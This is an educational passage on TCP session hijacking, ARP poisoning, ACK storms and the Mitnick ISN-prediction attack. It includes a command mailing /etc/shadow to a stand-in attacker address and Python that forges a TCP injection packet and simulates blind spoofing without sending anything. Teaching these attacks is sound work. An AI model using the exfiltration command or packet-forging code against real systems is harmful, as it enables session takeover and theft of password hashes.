4: IP hijacking
Let's suppose I'm an ordinary computer user: I have no security knowledge
and I don't see the difference between telnet and ssh. I use telnet from home
to start a session on my server. I enter my username and password, and from
then on I exchange data with the server without any further form of
authentication. An attacker able to sniff the traffic grabs my SEQ/ACK
numbers, cuts me off the connection using ARP poisoning, and then inserts
commands in my place. He can easily plant a backdoor on my server or steal
its secrets (mail evil@hackers.com < /etc/shadow is enough, if my session
runs as root).

Injecting data desynchronizes the two ends, though: the server now
acknowledges bytes my machine never sent, my machine answers with an ACK of
its own, and the two keep trading ACKs forever. To stop this ACK storm from
interfering with his attack, the hacker must first knock me out with ARP
poisoning or any other DoS method, like SYN flooding.

Remember how Kevin Mitnick hacked Shimomura's network? Shimomura was using
rlogin because, being the only owner of the network, he trusted every
computer inside it. Mitnick, situated outside the trusted zone, impersonated
one of the trusted machines. He guessed the SEQ/ACK numbers easily because
the older TCP/IP software was vulnerable to initial sequence number (ISN)
prediction.

Today, IP spoofing from the Internet (and likewise DNS cache poisoning) is
hard because the right sequence number or ID is very hard to predict. But
there is ARP spoofing: on the local network you don't guess the numbers, you
sniff them. And I think a multithreaded brute-forcer will work, if you are
lucky enough.
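The hijack described above, as an added example that is not part of the original text: from the last sniffed server-to-client segment it derives the SEQ/ACK numbers a forged client-to-server segment must carry, builds the raw IPv4/TCP bytes with valid checksums (nothing is sent), and then models, with just enough RFC 793 state, why the two ends fall into an ACK storm unless the real client has been silenced first. The addresses, ports and sequence numbers are constructed, and the model assumes the client had already received the sniffed segment, so both ends were in sync right before the injection.

```python
# Added example, not from the original text.  Nothing is sent: from the last sniffed
# server->client segment it derives the SEQ/ACK a forged client->server segment must
# carry, builds the raw IPv4/TCP bytes with valid checksums, and then models why an
# ACK storm follows unless the real client is silenced first.  Addresses, ports and
# sequence numbers are constructed.
import socket
import struct

CLIENT_IP, SERVER_IP = "192.0.2.10", "192.0.2.20"     # constructed (TEST-NET-1)
CLIENT_PORT, TELNET_PORT = 40000, 23
# Last sniffed server->client segment: the server echoing 5 keystrokes to the victim.
SNIFFED = {"seq": 0x1000_0000, "ack": 0x2000_0000, "len": 5}
INJECTED = b"mail evil@hackers.com < /etc/shadow\r\n"      # the command from the text


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum; returns 0 when run over data whose checksum field is filled in."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def hijack_numbers(sniffed):
    """The forged client->server segment must carry
         SEQ = next byte the server expects from the client = the server's ACK field,
         ACK = next byte the client expects from the server = server SEQ + payload length."""
    return sniffed["ack"], (sniffed["seq"] + sniffed["len"]) & 0xFFFFFFFF


def build_packet(src_ip, dst_ip, sport, dport, seq, ack, payload, flags=0x18):
    """Raw IPv4 header + TCP header (PSH|ACK by default) + payload, both checksums set."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 65535, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", ones_complement_sum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x1234, 0x4000, 64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", ones_complement_sum(ip)) + ip[12:]
    return ip + tcp + payload


def verify_packet(pkt):
    """Parse the packet back and recheck both checksums, as a receiving stack would."""
    ihl = (pkt[0] & 0x0F) * 4
    ip, tcp = pkt[:ihl], pkt[ihl:]
    sport, dport, seq, ack = struct.unpack("!HHII", tcp[:12])
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, socket.IPPROTO_TCP, len(tcp))
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "ip_csum_ok": ones_complement_sum(ip) == 0,
            "tcp_csum_ok": ones_complement_sum(pseudo + tcp) == 0}


class Endpoint:
    """Just enough TCP state (RFC 793 SND.NXT / RCV.NXT) to show the storm."""

    def __init__(self, snd_nxt, rcv_nxt, wnd=65535):
        self.snd_nxt, self.rcv_nxt, self.wnd = snd_nxt, rcv_nxt, wnd

    def on_data(self, seq, length):
        """In-order data is accepted; either way we answer with a pure ACK (seq, ack)."""
        if seq == self.rcv_nxt:
            self.rcv_nxt = (self.rcv_nxt + length) & 0xFFFFFFFF
        return self.snd_nxt, self.rcv_nxt

    def on_ack(self, seg_seq, seg_ack):
        """RFC 793: an empty segment outside the receive window, or one acknowledging
        bytes we never sent (SEG.ACK > SND.NXT), is dropped and answered with our own ACK."""
        in_window = self.rcv_nxt <= seg_seq < self.rcv_nxt + self.wnd
        if not in_window or seg_ack > self.snd_nxt:
            return self.snd_nxt, self.rcv_nxt
        return None                                      # in sync: nothing to say


def ack_storm(sniffed, injected_len, client_silenced=False, max_rounds=10):
    """Inject injected_len bytes as the client.  Returns (acks_exchanged, desync_bytes);
    acks_exchanged == 1 + 2*max_rounds means the two ends never stopped (the storm)."""
    srv_nxt = (sniffed["seq"] + sniffed["len"]) & 0xFFFFFFFF
    client = Endpoint(snd_nxt=sniffed["ack"], rcv_nxt=srv_nxt)   # in sync before the attack
    server = Endpoint(snd_nxt=srv_nxt, rcv_nxt=sniffed["ack"])
    seq, _ack = hijack_numbers(sniffed)
    reply = server.on_data(seq, injected_len)            # server accepts the attacker's bytes
    acks = 1
    for _ in range(0 if client_silenced else max_rounds):  # a DoS'd client never answers
        reply = client.on_ack(*reply)                    # ACK for bytes the client never sent
        if reply is None:
            break
        acks += 1
        reply = server.on_ack(*reply)                    # SEQ now below the server's RCV.NXT
        if reply is None:
            break
        acks += 1
    return acks, (server.rcv_nxt - client.snd_nxt) & 0xFFFFFFFF


if __name__ == "__main__":
    seq, ack = hijack_numbers(SNIFFED)
    pkt = build_packet(CLIENT_IP, SERVER_IP, CLIENT_PORT, TELNET_PORT, seq, ack, INJECTED)
    print(verify_packet(pkt))
    print("storm:", ack_storm(SNIFFED, len(INJECTED)))
    print("client silenced:", ack_storm(SNIFFED, len(INJECTED), client_silenced=True))
```

The storm model is the whole argument for the DoS step: once the server has swallowed the injected bytes, every ACK it sends claims more data than the real client ever transmitted, the client's reply carries a SEQ the server treats as old, and neither side's state ever moves; only a client that cannot answer (ARP-poisoned or flooded) breaks the loop.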
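The ISN-prediction step of the Mitnick/Shimomura attack mentioned above, as an added example that is not part of the original text and not the code of any real operating system: the attacker never sees the target's SYN-ACK, so the ACK he forges from the trusted host's address must carry a guessed ISN+1. `old_isn_generator` is a simplified stand-in for the predictable stacks of the time (a fixed increment per connection; the per-second component is left out, and the two probes and the spoofed SYN are assumed to happen within the same tick); `random_isn_generator` stands for a modern stack. Host addresses are constructed, and the trusted host is assumed to be silenced by a SYN flood so it never RSTs the unexpected SYN-ACK.

```python
# Added example, not from the original text: a model of the blind-spoofing step in the
# Mitnick/Shimomura attack.  old_isn_generator() is a simplified stand-in for the
# predictable TCP stacks of the time (fixed bump per connection, per-second component
# left out), not the code of any specific OS.  Addresses are constructed.
import secrets

TRUSTED_IP = "10.0.0.2"       # constructed: the rlogin-trusted host (SYN-flooded into silence)
ATTACKER_IP = "203.0.113.5"   # constructed: the attacker's real address


class Target:
    """Server side of the TCP handshake.  It trusts TRUSTED_IP by address alone (rlogin
    style), so whoever completes a handshake that appears to come from it gets a shell."""

    def __init__(self, isn_source):
        self.isn_source = isn_source     # callable returning the ISN for a new connection
        self.pending = {}                # src_ip -> ISN we put in the SYN-ACK

    def syn(self, src_ip):
        isn = self.isn_source()
        self.pending[src_ip] = isn
        return isn                       # the SYN-ACK is delivered to src_ip, not to the sender

    def ack(self, src_ip, ack_num):
        """The handshake completes only if ack_num == our ISN + 1."""
        isn = self.pending.pop(src_ip, None)
        return isn is not None and ack_num == ((isn + 1) & 0xFFFFFFFF)


def old_isn_generator(start=0x1234_0000, per_connection=64_000):
    """Predictable ISN: each new connection adds a fixed constant (modelled behaviour)."""
    state = {"isn": start}

    def nxt():
        state["isn"] = (state["isn"] + per_connection) & 0xFFFFFFFF
        return state["isn"]
    return nxt


def random_isn_generator():
    """What a modern stack does: an unguessable 32-bit ISN per connection."""
    return lambda: secrets.randbits(32)


def blind_spoof(target):
    """1. Two probes from our own address: these SYN-ACKs we do see, so we learn the
          current ISN and the per-connection step.
       2. A SYN spoofed from TRUSTED_IP; its SYN-ACK goes to the trusted host, which is
          silenced (SYN flood) and so never answers with the RST that would kill us.
       3. An ACK spoofed from TRUSTED_IP carrying the predicted ISN + 1.
       Returns True if the target considers the connection established."""
    first = target.syn(ATTACKER_IP)
    target.ack(ATTACKER_IP, first + 1)
    second = target.syn(ATTACKER_IP)
    target.ack(ATTACKER_IP, second + 1)
    step = (second - first) & 0xFFFFFFFF
    predicted = (second + step) & 0xFFFFFFFF
    target.syn(TRUSTED_IP)                               # the reply goes where we cannot see it
    return target.ack(TRUSTED_IP, (predicted + 1) & 0xFFFFFFFF)


def success_rate(isn_factory, attempts=200):
    """Fraction of blind-spoof attempts that complete, each against a fresh target."""
    wins = sum(blind_spoof(Target(isn_factory())) for _ in range(attempts))
    return wins / attempts


if __name__ == "__main__":
    print("predictable ISN:", success_rate(old_isn_generator))
    print("random ISN:     ", success_rate(random_isn_generator))
```

Against the predictable generator two probes are enough to recover the step and land the forged ACK every time; against a randomized ISN the same procedure has a 1 in 2^32 chance per attempt, which is why the text says blind spoofing from the Internet is hard today and why, on a LAN, sniffing the numbers replaces guessing them.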